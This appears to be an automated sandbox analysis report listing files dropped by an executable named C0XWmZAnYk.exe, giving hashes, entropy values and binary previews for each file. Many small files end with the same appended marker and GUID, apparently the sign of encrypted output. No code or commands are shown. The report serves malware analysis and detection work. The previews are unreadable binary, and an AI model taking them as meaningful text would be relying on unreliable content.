              Preview:..E........'.,..V.xE{.FI ....Ww..YPf.......w6pre...}.,P..`hN1.m.... .......k..z*V9.....+.BV..l.7[.9....S....*W...A.LE..Q..".t..b.FF;......u...E..W.....0....x.O........8.....l>..T.r@P.....l.H..3./)L....|.8.J.... WJt.(Iy..q..c.y.....3Q....F..P..I...\......7.....L...-...._..[.z.....,....y.....X..Z..f...O.c.....v.h..}.5...\.j<...R.....y..li.....a...$m{".N.........?...v0.r_..3A.P.}R.j..3y....?.9T`)...._...9...9iZ.....>..(L Y.I......._.....*t..4.E...r..b9...ic.}..e.+~HN.?zQ....sx..p...W....)%.1.&.&t?./....Un.7.'..T.....P....KR.S....-.....a:..)HF.8.A\!ZZ....!...V..N.B.#+'>r%.......;I.p..A.e..M......../..o*CB......Q.g..(...F3p.....G......*:(".....#...j.A...!c+Ypl......[&...-..$<3tv...)....{..l[..m/.z.\.O[...\...).K.}...)......&...^.0V.....2..%....S......).a.....C..!s\.....t..#....K..LJf(..Q.......)..g .{.g.]-.....0G....%.......:.4....F...Q..&."..).Xt.........Q.!..MH.C..g].7+...M....|b..`.H. q.1.K#^l.q..II.....F...r..|;}..H}"F...K.se`. .
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.959231042622
              Encrypted:false
              SSDEEP:3072:7QibWbDHB7HRbMZeJhGpq3IcfBTQAVZg0xc3D44224PKt/E+kicg/kqx2XVNl/Qz:ne7HRbMZeCgFPg0xUDBRvG3FXzBQ0fhw
              MD5:99ABCD16FEAF08110B496A037882A8EE
              SHA1:4BD3FD697B856D47C242C36F3D79646F7C99999E
              SHA-256:BE2A010F30A2481F9B13AD8D54F0E5AC7C3116E0A1AA26823F8C8D429B3102C3
              SHA-512:D77C5E31F39F60CF95CD0C62B8DA3F28665B2A31D35C1ACCAE2BA11F8B2556961FC43DDCA5EE27C7908C43522CB7C523E1058F8635EFFD1909423FAE52A91980
              Malicious:false
              Preview:?.8T.af.=_...ij.q.RXu......6.]?.L.k..kI9....! j.......=.5R.D...B:5JR..Y.P..j.. SO1.gP.>.p1..._S...y...F#".`..K..s.D!...Bf..5UC.v'.Z.%qm..Z.mF....'...?.....1.L....V._...7......m.a..c!.T,.e5+.%.'.`.U.ScT.2..=.K.S........Y.....6..s..w.u#>....7Ms.YN]..Y.9.C.|m^M.....?....E..u%.@,.T.5.P....SejW-.N...&.Y#3... .@2....h@.....N?tT..v.!0.k../.....x..u.....r..7..w.h.2........u.V..;.@w..e#~....+3..'.8y......A...fG^..ML0.!-.Z.@.xG...%....].a.k.#..HZ...4..D.s.S:.VY.O...8.oQ.V.._S)|...m...I.OK..dUsp:g.Z.:.PU....}A.8.S!...[e..qaQ...o._....=......(E.\F0.j.x..A...O...Dd....E....i._.=..&.....W.............u>......5,.6..P.[..o.....d.]0t2a}.J.H..)].{..D.v.s.]......7...o.A"mo.CBH.z...M"'.kP.I.......\.@...7e......e.[ts....?"..a..H.4.ah....cXQ;G.&+(6....m!.|...|..Q...]..".....N...lf...Z..g7..p.|......&.....`.d..|DbO#[7.3..s.&.7...d.O.UW.........#;shbE-.#...5,)[^..9@R4....+...t.....Qo..~0w.....Cz..F.=jh...dho....Phc.@.YZ..a.Nx..x.(.....A..m..v.Wp.9
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.208522323354044
              Encrypted:false
              SSDEEP:6144:dSpQ6o/xefc3KKS5GCrkAXcv9+2aernRHkIac:wpno/acahnrNMv9+irRHkIac
              MD5:AA3996B085220CC2CA2507D9D49E4EBB
              SHA1:0B3FF3422BCBF72DBA94C53FE918C9B0C09980A5
              SHA-256:B2F7EC0C8961E0A43E6F352B558F99CBB4FBE7E49FA27DAB7F86D32108F69E68
              SHA-512:34C9BAA2B04F13DD3C73B5193CBBFFDA3BCAD7DE84D6F493FD358C028997E7B59C862F57510F030239498D4039C61E18B529DC6DE140F451112E467B27693B87
              Malicious:false
              Preview:.....zb..%....s\wH.%...;.t...F.....;A..H...^.q..j..&..F.'az.M..E...*0..d..OY.k.iut?........M.....g/BS......E.LO+.E6/..S.(..,.8..+_..~..jQ.>...'...DF.h.e".-.9._..{.3...6.".i.^..@H...iQ2(!......._...+.E|.../.-f..f.-$Xv.....%....^....<m..o+..1.R..M.4r.....s.S.4Xr1>m....u.P.@.6}.y.P.nyDe!...(.-......|f.yo........S{.....*....K.X'(Z....v......j3......"HX#].;g6...V........T.-Wl./.4.Ky&j3n..........kUQm.....#.s.8... sv,4E`.}1I....n.L%N....6-iE....\3.sH.q._.S.V....G..@-..+...]........7..x.=n.gTq..Z.0.F..A.....y....u.n....?..'.....Jly..K...^2.*|f.|u..<M/.m.....rA.....%.B.xr#..+T.+.,..T.B*RD.>...5:..9).v...e?2-.9....N.E....A*W..p.;Q.?RXj.g..1....s.c.....v&q.N......f..q\=dRzp.....V....u..f(...M...E.y...B..E...l.....;... .H.c.6....f&.....".NBX..f.Yb.'.........6Tk%u...w...E........'=.6..%.xt(..I..DyS=..;#....>.k8..&-t..S..S.<.K.kc.....1....<.......:A`[..v.l...Xxr.a&SJ.U.a...}....]L.yB.......i..s8.....6..u....y.b.[.......N.[a~....$...
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2082107588278967
              Encrypted:false
              SSDEEP:3072:5cXTzTB/GlL2bOLaU+gmTLy7UJQCzdGzoLKvsgiXoJWns8B/GdFOLK:qXTzT8ogaUXmTLyoJQKdLLtpyWn5Gd0+
              MD5:5A2A0D89538BFE7C6819C91963072D77
              SHA1:691906E31B4427735762BCA924CD2F3B7ABBDA0F
              SHA-256:478BCAD09B485801B2872C18146AB4B1AD5277F6A3C29287502733010CA51624
              SHA-512:C0B0632E7540E4E18DB230AB0A69EE7E4A72DD8FE1192BCA2E1377EB0B472BDA7E9D835441B826F094689A6F33A77A9BF0F9BF4014BE24053B3EC9160086B67F
              Malicious:false
              Preview:.....E..@=....\...z....d....!.^...X.`.......>.U.a*.f.iW|4..%#.$.......I....>..N..zu....4.r....IW9R$5.A....B.a.L....t.Y>...t.b,.N....y*L~...&......."~....&. 9.....W~......`..>.^....c...L.....^Mh...S^......NFz.;>.bTZ...H.q-.Fsm.n.D....m..w.T\.9j.nL.....9.y.N+t..{ln.....XL....8......S...d..R..4^@..A..qY5.R.........n..c0......J*.v.e-).@..A.....'5...b+.Jpc.p.._t..mq'Z....@....e..)d9+.hv.377..TME?..o..$..}OB7.#.1..6\.8|..B.t..Iv.X.D...Z.qH...E..D)....~.vT.8....h.......+....6...(.dZ7.......(..5......=.W.../..'IA..i.....S...P.pZ-+.8x@.e.w$..-O.Y.k...2^.....=9...4C?.w....+.u.. .Q9.......M..y......<...W. ...-.g..;.M.x...R.J....@..SC...[U'k..4h....Y.Fa..4..~uSQ:.~.+:n..#.`4...0..\G..6/<.A..lp.F(..c.....L.B;.fE..|9..E.......h..w)..R:-sP'..H..N...q..4F../M.=-.Tc.~.k....g.#..f(M..7..dQ.......x.q...(z9.9...<..\.Y$.....X..?...:oD.f\(....'.A.O>.BK....V..Y.......J.a.- wTm....:4.j.r3X.=K...Lc\.Q..9.h.e&.....2.r....."...z.......X6/.....lS.=..*E.]P..5.U......
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):524622
              Entropy (8bit):3.2080022527338445
              Encrypted:false
              SSDEEP:3072:w7gKLxPIhjVU/GTkdMXO5dSTce4cEQttcwO8HnBpI+AU1NCUVA:w7gWxIhgG4rETscE2cwO8HBqo1wUVA
              MD5:23A0DE95949E46AECFD8497BDEA6D525
              SHA1:69AFD7615C416B17C91453C5700147A6E9F29AE0
              SHA-256:DD072E59BAE3A52FE22541F80B53B8F93DBC476CBD4A2A0AE0EB99C1CFECBE19
              SHA-512:41E9FFBFDD1B13DEFE75C1003E95432632D940610D5B4C7FC72280AB5CC3068A389162EB34F265B066F7C0D4CA1F5AB8A794FDD6F16E76EF948FD03837CEF18A
              Malicious:false
              Preview:......0.].Z.>.l.;*....9...`."#3... i..^7..q....f..g'...q.....|BX....J.}:....Y.}/m.5B..9.I..xSN.7f!=..z.H=..._,.......").Z..5..;...X.T..0.,=..U.Tr.f0?...uy...khPs..6.e.'abKOC.h.*.tU..eq.Bq.o..Z?>,H.gv$../V...:.+.!d.Y..|.... ..v.'Yr.....zAOe.....E.G)...:..v.-.o..h...'.ll..TZ.+.J....W..Z.. ....72p....P4.,'.v.....G.\...{I_....$$..c..+.[....p.!R.E.4...m..<d..U^..<....9.VD.&...5.r+.Al.".`..+f.?...LG...t..B..|&xD...rwt5g8...Q....<...}.R..e...;(.L...q4.+@B..._a.ci!..jq...m.{Yi.q@....\.*O....C.ye......5#aj.........^.....[q .z.@..x.....]'..'.....g..bqf.f..........J...:...,H....$.......<SM......S.0...!iO..h'7.....[.-.....x..h......N.".O..P..1..~..N8......}...`.".....r.tV.r....Pg^....U.)....f.Q].9...x../...T-4.{....n..7KD...T......J.G..K.jY.OP".&.}.....7R.B..$.....`.E.s.l....p}sl}.FpzU.3.n%..xc..T....x!pG......t")%T..6..ly.....{:8.zL.;,E@..g....!.>o.WE.:r%.M|....[uje4TN.../.C..+.....AvOD.....kq7..3xM..]C.~.!C..M.8...c..F|......5..;ef......!.~....Y9.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):3384
              Entropy (8bit):7.952334646998408
              Encrypted:false
              SSDEEP:96:/kXWLQnt1xdFw8VJfXjYrmHMzzrGkHk+zE:/DL8tRTVxzCmHMjrE
              MD5:861DF175698D4ACFAEC61DF812D9231C
              SHA1:1C5A9A5AD7B7EDB30769036F3D3CBB31816F80F4
              SHA-256:09175CCE9D0B7E84A6148E886621E25D5EF67A6FC220A946088DCA112791AFF1
              SHA-512:4013A288F6C51C043742C206BAC62829E9BC8A23B3E466C425755A5737C4F0D5DF7F4C09467405BD1A433BFC59A43C9521BA8090BFB0BA31702FB762347C7CB9
              Malicious:false
              Preview:<?xml.V...[..G.].#+}....u.....-.g...Y]h.Ix.VG..z&.....ss...qG...'..(.r1..vC..]..r...6....wT.H8.&!..n.OK ."z......V.9.e.M..1...ir3d......5.8...|......i$l..9j.M...O,Q.@x!O....].\....8P._...?v<w.g...T............'O%?.&.+.oK~.T.....).L.y.%'jou..B...."...Qvi...#LMl..L..Y.T`..............v...8..~b..q.....`..u..^.S`5G_..r/-.....{i.}K..].;a@'.>cl.g.._.$P...&......)....y....e>.8....JM.U,:..^{f.........my`.3.x.L.....G}.y.U.T.R..!.<.Ul...Z..v.......}x<G.5..+..\.G.R.=...!..(./..5...._..,..X.......>....4Z...c....0..c..)....qF.o4.v..#3..k...[..8@.......:g....<..U.V .yG..M8Y......yS....5.........po". .....0..~x....w..<.)qIfi.[.'..U:.w.2tn.D..=j.p8MQ..oQ.....s..7.w....]....!..t..e...I..K.N.,7|.j+ *3........Q..!l....q4t....b.....h......1.....I... ...$..0.S........Rf..I.Ut..,'..5j_.Q>.L.Y.?..n...%...Ac.7....oX.).M..;m`T.,.uY.7=*w..f..3........A......}lq.?R..Q...k...uKZ.:......yb.@{..c..L.!.0l?.}..I=..X<.&.TB.H.......t=Q...}Z..&.T...'....m...,D4U..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1062891
              Entropy (8bit):5.528891457175843
              Encrypted:false
              SSDEEP:12288:5ZtjrCVYxVsyOVURXSZlV0N8x5thr291gess3TylunXW:5ZADFVUa
              MD5:82934C5892C2B648413BCFABD74667E2
              SHA1:2375BB4C293183516971C33B38E17A41925BD86F
              SHA-256:EF3F6E083E9E26BB86E25A9A9313DC0CC13470AE2AB0C3A59B90BAD127DB6CFA
              SHA-512:8EE77BB9D6F5F4DFB6ED0D11C10A7F12D29AD6783D3A9B0E3870D5FA676DB13A854159B1199A460973D71112A70FAEDCC95AEBEBFF6E91E84BECC288355605CD
              Malicious:false
              Preview:<Rulerk.?J...)..B.O.v.G2./?.oQ`.?.......Q....b .s.x.WY.JK.{U..>-v....P-.V.G!|........$}9.c0......H..,.h`..-..b....*.wxf.....p+>..{T.J......HR.N.l.......J.,z*.i%.X..7).....u.Jv.2.f.H..4.......4..I.s...d..P...}..%...o.L.S.`.8...o.Xq.......i)G[. .U.....O...`.g$.j1b...z.....vm........O.#[q..v..i..t<...QA;.o...e6...=.:.Y..:..'..W...B...R.9.PzZ........y.A.u..?..../.54j4=-F.J7..X<.f.@..:hW.......Fp...@....v..C....47{.|..W.....fY.....w#.....;.S^.W9nh...0q.g..,...%P.........&.O.1......1..v...4..t`.wQ...._........6..h<O....e..'...f..|U(.`i......0.[[.|.6t..[P......&.sI.Cz.M..*\.Tga...0....(.G%%{..X.sb.J..}.e.aB.......bi..d......vG.y....).z....N... b...Z.f....&.WQ..`..q...^p.E.sU}..v....9.L*..+l...G.*..P[y......R.....cz..i.U..uo....$v.`..9YEkk.f:..9...CU.*.xP.)....*..!.).. ..Us.m.....*t...n*..@.N.A.Y}.(5.,hSP#.hq....t./...#m.C.P.|=/,.Zv/...|.exEWD/x.;^..w=...VC .....:.w..a..S6.n..j.w_.B...3C6....iD$g.T..?....m.K.....r.}e......$.....Q.?...?."..
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):2493
              Entropy (8bit):7.932953572900831
              Encrypted:false
              SSDEEP:48:vYUbB2qYSyzmmUU1wepxRb5zxe8gPuTHuRU2izzX9Td28a1y8D:JB8zW6w4Tdzxe8gPMORnjD
              MD5:B5457844830859DF85B76009305D014E
              SHA1:E58926137614DBAED3644C7E67B8BFC7D351FF7D
              SHA-256:A6142DB70F0B5C80A0628186320874387F54B973D160B44DFF662B806847512F
              SHA-512:57285E3BB511AB2C8F448B6EA32544C9D1C981FD219BE945B6DB9C9D900DFF261199C42172AD1B7C2C96D176A15A17D4C4A5ACF207EFC1F135BC893D57F6A3E7
              Malicious:false
              Preview:<?xml...!..*.}.Qx.&u...........|.|.({..zq.x...~.~..k.1xL}^F.K....ip!/xz/.....u.Y.n..}.|.........S.1...I..%.<.....5...G..F......<.C..NV....j. ..w.[#.].Z.k.@.-......G.k.jd.E..a"..d1..DR...'.....R[.Z..R.\....'....;.B......8.F..TsrlS...~..X.I../.Br*.n...<..$.b..J@.-...c&.;....@..F..,K..*.D..G..].T.u.I..Q.gl...N~4A.......8.o....I.z..U.f._.M...F.d..<......1....].LS/...........<.Lh`.{.CX.....z.i.G=.f...U.v.3.-..z;......U.....I+;...s..'.....e........z.A....6..>.....c....)^..NRn."....2.l*f#.....j.F.%."..? d..).u.{...2..n.>.R......8...{W.Yt.f.u.V..zk.(g@<.-.....T...._.......'OU%.].WS.0&...:!.#....'H.=.......c.....3.vH...y..5..(..yB.i4...?.p=...Po..$..BX.*nhB=..EkM.5. ..w.l...#.....).1.="...|.G5.T.Q.H..Q*.5..$.<E......F..KC.~wk..l..Q&..d U4.r.Kzr."."..M.........g..hA....[.h(.@...N.......k.)...{.e.X}.Q."..J.A.T./.Mxbh...g....).]X...8.....l...I....c.D&.>...&W.E.......g8.......L.v.6....#.J.4...]..j...9`.U...PXu.U.y.....N.>!.,.qm.hxs.j9....F...._A....e
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):741
              Entropy (8bit):7.666871396995981
              Encrypted:false
              SSDEEP:12:MuYP4fGF0jLdEa1skVDCEF/Ay87tugiDPmUOvH6UCMXxBgvMoLTeCydxa3cii9a:FYP4AQLdEaO4CY/Ay8BmpwH6UPXgZLRp
              MD5:9AC22F2A108EC27CB481270CFEE220AF
              SHA1:65D5B453B28CC896AB0E6348E38B7DBF4D8B1E8B
              SHA-256:6E61EA6E288E331D7EDEB3932CD9B64B094B93C473BEAE99ED205F5F54E42AEE
              SHA-512:600BB27D10A9AF75BE0B4689E144F98581AA1ACFEC87CA2CD7D012E067955C62B3F2EAEA4E2B8AD69E10688952A23D34F4CDB9D9C12A39AC56A1ACD30A90BC95
              Malicious:false
              Preview:<?xml1x4 EC.j..|j.>.l1...g./#Z?.3c....W..h.G..s16..BvM"G'.|l..s(.'.E...v..........o.*4.U.".F..Dh.WX...W......Ya.m.l....x{`.{.S.....5.{.sX..5.zT.@.9+.~p...Io..!.,........2?..07Q...h+yR.%...............C.4....l9..1.I.'.U...D.`/.?...^.0..G.*t+.#..Q......w..W.#C'.}...... .^.%.......aMy.d.w.... A.I\4t..`..s.z..?.....i@:......R.0.U.QZ.7...^.z........To.a....\.~/,.|$.4\Ky......4.,..~.OPb..o4.r.......%..ASB.........f.&....{......H.\6e..#.....UG...PE.U@P...M..}%.....J..H.vD.i...G..W.o7,......CY..l..?...aa5v..6,Pi.....H!6.V]R....r(..".A,es.'..4...U..{..`b.Rr.M.x.....w8.<v..^.G.s.B"..`Q........c.J(.....<'?c.=...'C*..7....Ft.,....gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):807
              Entropy (8bit):7.74447198978938
              Encrypted:false
              SSDEEP:24:2gf9YpWDKSr3jscuzQRv6xA1MjrZ+xpZe7wqd+bD:R1YYDRscuU021MwMwM8D
              MD5:9CE6304C42584126363FC8CA52A2894F
              SHA1:34BCF85C963890B5C2D37506608B9B66648E62CB
              SHA-256:B20C647D20B34A763CD3B974538F839CD011C3A5D84A7C1CAA8113D69C240183
              SHA-512:A958A9D5046958B6CBC62B16AB1B3EF605EE466DD60178B93781689E211A68772788A775BB38592D764FADF15D3478FAA8E1DC8E725A31FAA7024A104C431B3D
              Malicious:false
              Preview:<?xml...".W...M9+..#.hg.G.#P@..2...)w..~..93D..f}o...`.ei{....Q....5.]..>.......P....>$......7G.T......~.?M.w.).[M.}"...C..i.=#z...L.f..d...=..b.1?....@>...nT.....d.u..e.....a...Mz>.x..k. }.z$b...A..AC.;. J......kWL.)<Ff3_..e....AA.!G..7....."....8..!....`......V.? ~..v>z....R.X>._..+..X...Q..=K...D\..w..)(|.lj..rTh....).-.Qn.}uU..7d...5}.#I.K.....{.\d.?.A.&..`C)....b.N..F'.....o.I.VX}..3.E_......'..WA.#&.Aso.=. s............o....].&..|M^b.8..........q..`.-~....a...P...T.X..7.Fe...m..l..B..agE...........`.W..#.}..7.).g...v..M.!."_Z...R.p-\...).F....]-...U.....Q...e.q|.....a..l...W...s..5..T.?..6.....6....Z....$...../..........BV.lU.8....Il..`..#..=....'...HPY......[4..%.......gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):748
              Entropy (8bit):7.720791302367758
              Encrypted:false
              SSDEEP:12:z67ckplXf1xqIVfPt8lKyj3z9gIKSQCqrpL/72hsT3jzNc2VzMLu1l6x8ocGDdx6:+ckLXfSIVXwxdqrlq2TTzCwQyxolDd+X
              MD5:123DBB45B20A5E4578B73303CA1D29D0
              SHA1:528CC5DE4E3088576C515512DC36DBADD8CCF2DA
              SHA-256:7F4B17957F0CDDEAD905F48C580C3A869C105BCD75B7E465E9CD1797671E74B5
              SHA-512:8A84F8F0596D079B75DB5F6BBDD4584F0B6CFF5AD54B22CBF5EF29964426CB47E6A95EF02091D67B07BB50133678B3EB536FB7368F58C9A4E2A7A2BDA4B5382E
              Malicious:false
              Preview:<?xmlt..~.~f..W..........\./..(..V..w.P..P...%.....6.0..0cj@.K..z...P}....f.%..(.o..g.(.(..H..}.b..q..(.?X.4..=..z.^.-.V.;.-.k".8.v.......A........?.4...|.=.....R,.?q.....V....JK..\.N.q..~3.D..)..uP4...zA....(...0...W.....yM..AQ...e^..8.B..:..G.w....]...r..#>VJ*..N.%..p....N."....N.......o...lXz."..T%...Oq^...G......B|..3.....w....>..p......{...r_.7........\.........G.N..H.....#..j_....R.\...E0#...[I.9.>..6.?..G...M. .BD<.m..X'Q...k,..F...b..|.abO.lS..s...Q.b]....nf.X.{.k........9j.C.O..n.gJ........G.z.....q...w..N.u5H:........-.Q..1..)5..j{..*&...G?#.\.s:H/..-M'.@.....Sb...2p......7.j.~].D,..@.z........xn.f%a.M..Y.......u.<JgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):804
              Entropy (8bit):7.710340156241148
              Encrypted:false
              SSDEEP:24:GQ2zizURAvRgZwAeSKxCkIPgQjHS8ZK6PBfoFmxgF/RV0d+bD:GQ22mZwAbKxSPfS8nLAbq8D
              MD5:4C6A19F275A6C2E4129DB6E573633AC7
              SHA1:345089CE08D76E8B5341F0F9E8E85E4EA89F9623
              SHA-256:F70144744D4B5336837E7E596246EB33CB7B550710090048B81F670EC8460D5A
              SHA-512:558401FFC215DD25F82686BCA6AC673632E138148333CFCA7D955FBC0BE157FAD736035E3FA4C67133AC1D8398A6095A3DCC2F277D6A38B1DCA332BBF3B865EC
              Malicious:false
              Preview:<?xml......mVY<B./*.V..t<F..kYQ*QV..f.....}.....J.......>..?.a....=Tc..^...,2.n..<T._.sj....x....,#Q....A.X....Fx..a...Y.\..w7..S]1.T..QTHM7 ..v.cj.a.~zS3K5.Nx.(.,&..&.\~.8..z..O.z7.].^C.aw]....$.i3..'`.O.._..$..p..>GY=Z&...{..CB,....>.l,:..}.D..~:..)......K...<..0...~.L.......|1.B.J}.%+.6l.W..<.#.....e....o..o5.e.....8ws.&._...E$.V...........]..D].MWAX5$..0.......'A.....*....`.n......A.'.c.{.nL>..;....N..5...?.....7..Dj9a.^.(.....&.@...1...b.T;.zg..#)"...VU..w'r.GT......$a.+....y..vu.8z.....==....}e....Q-~_!.~.'..BZ..=...[..P|.w.9!.6.$.....gn%...:q#4.....8.. @..v-.@.P....D...,.I..}2.U.Ux./........PQ.".%.b..L..7...`.oRv..,.L.Q...K.(..l.<..c..Me.";...V......+...a...K..7xt.y..3.8]YgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):965
              Entropy (8bit):7.761465862912942
              Encrypted:false
              SSDEEP:24:dnZP7jnl4NgQkOdzZ5sU6AD5YthbptpeT40HY3p/rzEd+bD:/7rONV1ZD6NeMLH68D
              MD5:604AFBCC56954CE6A553724C19B2C8B0
              SHA1:ABE23C566D2E623DB8EE07A508CDA5EED0C63E2E
              SHA-256:08BF00BB118D22A85FEBA84799244E40229142886F607DD5C67D660A966A2B87
              SHA-512:6BE94CA2D7BF34782714422976A1339C89089C4D01683FDEBE7F4F8AC5B19B54FE3BF8684AEC37CB13283C03F4466374DD13AFF67C10918DD9A7D0523FC56358
              Malicious:false
              Preview:<?xml..za.g....{..<.B...S.)U..2.~.Ay."I.t...P..D...L.tyB.F....;.....i..3M.i?..f.N..g...&....C.U"5.,.+.nS....a...Z<O.{..3...=..W...wLp.uc.[...).M.B-....Q......*)|....$F.+[&...6..o.4I...)...Hl...S8.W.....c....Xsi].....p..HE....)...v.w.7.Go...]B'...........nZ.#Q.n"SF...U....7a@aZ.......$...9./&{S.%B.^*.p....|.7...=...M...A.2Y.._.....7.3.[.D.m.5.Q.t.........z..c..GE.<..+.;... .:..?.n..J.h@G.4..A...%.3n}......TI../LS.....sKp`.,<C..q.k...z.......Uv.U.....2....q.....JiRa.aO..(...K(..4..64.../CL.*BH..5..qHTB0(....1......f../.1.[..7..b..d..m.u^)...k..Rx....;...{....2.KLb....k... *..tD...ca........_.`.M..f..#..C..@h|...; 3...NH...".8.+m(..4R.-H[.2.-5A@E.?..n_...6.drH.....|.,O.A.v&Ro.....dq...rK..b.MW.`g.......oF.....(.Q......kV+.H4....=....c....u}~b...f.....P.M......Z.y....{.Aq........'...P...OL).H....Oo.E.A...Qs..u....,..t.#.g..0...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):800
              Entropy (8bit):7.714371604447187
              Encrypted:false
              SSDEEP:24:CqX4+57NAAoi+yIOzsXS64ktgqX687d+bD:Cqo+5RAVyFsEkVKA8D
              MD5:5C0BA6222A46FE738545E763C481A1C4
              SHA1:651E59551D900E9F746428E5A7C2B90D1F35E851
              SHA-256:6BC53193395F3188387F065175BDD606232AC1E4925B0A4B6457884C7252B69E
              SHA-512:3C33FFE7F5C15C9B47438807DF839F105DBC019B43929CB5876F9BEAC3B4CEAF17D4C8963564E3C595E1405DC936883C4C2291BC1E61518B90427CB36C19B091
              Malicious:false
              Preview:<?xml...)p.y.....t...$..w.[...._..8Rh.J..C.M.@.C.}....R.1:..3....P.r.y...a"./..E.5.(Dd...w2e....Iev..m .zK...j.)..~}o!.Vt...r...^........X.:.1{..N"l..fH..d.WU..82>.......>..w....\*..;.....`}.....d.U.W$.hjrL...........s...h........H.].A..B.....h1...x.....e.w4'.....j..Xl.4...>0.z.R.B.3....@.Xc]...pGF...?..V..<k!g,o....M....9.........X..Em..9^T..e..>.{....=..O;.<...|...)K'.}q3.N.~.....iS7..........L|cSI...u>....,>..x..'oGD...D3..F!S...q..L.>B.e..y.b..PwY..}9X...9.....M._..p'.s+.u..4...p.X.....".c*..]4..V...Go..H,...(An3...c.O....2U..K(.$8....U].1G|..X...S*&.5.....0.p6..P....*.Z.X.f...^..F..nB.5...A.g..Y.?.V &Y..5.^.0.P.yP.14is..B../Bw.k.....p...z.V.d...X.q.y...<...'-..I.(.D..BH.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):740
              Entropy (8bit):7.656974735733416
              Encrypted:false
              SSDEEP:12:ga8qQFfJ97gaBVW8ZxBJCQdyKtXc4rCCbardgM5R0YkzYiEkM0wA4gkGnVgLdxan:h8hl3cxyxvTdyKBrlbar+M3n0wA4god4
              MD5:79B73C061DE06F4A10F0150A60B274CA
              SHA1:9B7604E6EFB8CA34A96C698435821457897D92FF
              SHA-256:FC82FC996E1A002F94EC07F46216F52139EAE4BC2789617B038595E70165A555
              SHA-512:55145143F2A6D9C40F72C01E88A985258024B2B6074E6B8DBB1932D7D42A3EA3004A68CA633E1DDEF88F412965259078089FF2D5107104D5F8FDBAD19876153F
              Malicious:false
              Preview:<?xml.I@.....jM4.hzKUd...GI3zo...}.D....P..1.:.....({....-.L..@ ..J.E...K..O...Jj>.?.k{j.%.I6...V.q.-y}.&`.1D.7.....Q....6.w......F#...`g..{6|...&.LP....?...+.$...v=..o.].. #*3{8...lG.z....h..K.X".0....B9.....c...y.rZ].. .qqz...|.$.(|.t.eD.."q..J-.y^HW..VZ....?%...}*.J.....9.o....:.*;....zr....?........',I,..9.)?; =....B.8.....%......6.....n...C...gO.U.a...G..0..6i...!.^2U2.x_gt.M..<.R&.Z...L.x.H_B........w.b.\.&.../6..w....yN.>..I..a..[&.SC1...6.Y{.L.1.!.d..,...)....5...&.....^..E|....~...m.J...`..,.2se.....1..t.(:1f&......!1.I..^H.'...O....6w.<6..Ln...Q.e8...O;..VB8.7Q.3.G.8.S...).N$:%..^El$....XT\.c..|...Y...K.$4.|.tgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):819
              Entropy (8bit):7.731147977639791
              Encrypted:false
              SSDEEP:24:TXnWSLB9lfg9R5PAVWM3ONZtoP5asd+bD:rLyzPKWM+NZto8C8D
              MD5:05082A42ACED4D8AD6DFACDC197E1CF6
              SHA1:C8354E7702A2BA81639885513D79C2FFF6FB6DFA
              SHA-256:603E532CCB759396BE5B2D355CA466F05EFDE71109219682807BC701F7546ADB
              SHA-512:5D44EE0D9B43D851EE60DDFDA5C76287507C9B6669F143F08B1B4A310F07FF7A6614B5652F967A5893CD099F242B997120B1F16F81314CAC3208EE7851722C75
              Malicious:false
